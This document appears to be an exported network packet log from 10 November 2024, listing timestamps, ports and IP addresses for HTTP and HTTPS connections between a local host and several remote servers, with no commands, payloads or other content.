Nov 10, 2024 04:55:02.741148949 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741154909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741163015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741172075 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741180897 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741184950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741204023 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741209984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741213083 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741219997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741229057 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741244078 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741250038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741255045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741261005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741269112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741280079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741281033 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741302967 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741317987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741437912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741446018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741453886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741467953 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741470098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741477013 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741478920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741501093 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741517067 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741578102 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741594076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741604090 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741606951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741619110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741624117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741631031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741645098 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741657019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741666079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741674900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741684914 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741686106 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.741697073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.741704941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:04.676676989 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.676721096 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.676773071 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.676901102 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.676942110 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.677000999 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.679034948 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.679050922 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.679486990 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.679501057 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.731043100 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.731074095 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.731132984 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.731414080 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.731427908 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.812342882 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.812372923 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:04.812421083 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.812663078 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:04.812675953 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.544789076 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.545232058 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.545365095 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.545377970 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.545645952 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.545661926 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.546610117 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.546618938 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.546677113 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.546680927 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.548751116 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.548809052 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.548878908 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.548938036 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.549369097 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.549376011 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.549429893 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.549438000 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.577755928 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.578100920 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.578115940 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.578994036 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.579057932 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.579396009 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.579454899 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.579547882 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.579552889 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.594459057 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.594515085 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.625705004 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.665129900 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.665312052 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.665327072 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.666172981 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.666224957 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.666539907 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.666590929 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.666656971 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.707221985 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.707233906 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.763701916 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.764794111 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.764866114 CET	443	49705	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.764930964 CET	49705	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.822004080 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.822062016 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.822154999 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.822168112 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865514994 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865562916 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865592957 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865730047 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.865748882 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865807056 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.865808010 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.865813017 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.865951061 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.866125107 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.866163015 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.866311073 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.866342068 CET	443	49706	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.866395950 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.866413116 CET	49706	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.866420984 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.866425991 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.874224901 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.874430895 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.874435902 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.928205967 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.928212881 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.936079025 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.977193117 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.980882883 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.981040955 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.983222961 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.983228922 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.989821911 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.989938974 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.989955902 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.989984989 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.989990950 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.992609024 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.992650986 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.992772102 CET	443	49711	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.992829084 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.992839098 CET	49711	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.994314909 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:05.995074987 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:05.995079994 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.003617048 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.005593061 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.005599022 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.012675047 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.015214920 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.015222073 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.021575928 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.023222923 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.023227930 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.030909061 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.031219959 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.031225920 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.039606094 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.041292906 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.041301012 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.048069954 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.051215887 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.051222086 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.095990896 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.096120119 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.096148014 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.096187115 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.096208096 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.096208096 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.096215963 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.096715927 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.097032070 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.097035885 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.099209070 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.104907036 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.105015993 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.105066061 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.105070114 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.114109993 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.115219116 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.115221977 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.117590904 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.119236946 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.119240046 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.124557972 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.127223015 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.127226114 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.130995989 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.131055117 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.131058931 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.137134075 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.139223099 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.139225960 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.143636942 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.147213936 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.147217035 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.149705887 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.149765968 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.149770021 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.155921936 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.159260035 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.159262896 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.162127972 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.162169933 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.162216902 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.162220955 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.163198948 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.168550014 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.174737930 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.174768925 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.175229073 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.175232887 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.177241087 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.181090117 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.187333107 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.187382936 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.191237926 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.191242933 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.193628073 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.193691969 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.193696022 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.195214033 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.199992895 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.211549997 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.211575031 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.212482929 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.212511063 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.212553978 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.212564945 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.212629080 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.218348026 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.224441051 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.224473000 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.225390911 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.225394964 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.225512981 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.230200052 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.235806942 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.235838890 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.235857964 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.235862970 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.235903025 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.241292000 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.247081995 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.247117043 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.247136116 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.247142076 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.247184992 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.250355005 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.253907919 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.253936052 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.253961086 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.253966093 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.254019976 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.257112980 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.260442019 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.260471106 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.260519028 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.260524035 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.260565996 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.263704062 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.267127037 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.267158031 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.267196894 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.267200947 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.267246962 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.270477057 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.270519972 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.270566940 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.270570040 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.324467897 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.395262957 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.395332098 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:06.395520926 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.434743881 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.439552069 CET	49710	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:06.439564943 CET	443	49710	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:07.539187908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:07.539254904 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:08.884654045 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:08.884700060 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:08.884825945 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:08.885049105 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:08.885061026 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:09.743520021 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:09.743558884 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:09.743619919 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:09.743825912 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:09.743835926 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:09.903745890 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:09.903985977 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:09.908845901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:09.908860922 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:09.908921003 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:09.909091949 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:09.913930893 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:09.953774929 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:09.953793049 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:09.953862906 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:09.955229998 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:09.955240965 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:09.996100903 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:09.996362925 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:09.996383905 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:09.997286081 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:09.997342110 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:09.997668982 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:09.997730017 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:10.038264036 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:10.038269997 CET	443	49719	142.250.185.68	192.168.2.5
Nov 10, 2024 04:55:10.085351944 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:10.440783978 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:10.440815926 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:10.440901995 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:10.441143036 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:10.441159010 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:10.592879057 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.593173981 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.593189001 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.594055891 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.594120979 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.595037937 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.595094919 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.595211983 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.595217943 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.647667885 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.991672993 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991725922 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991755009 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991770029 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.991780996 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991811037 CET	443	49723	142.250.186.174	192.168.2.5
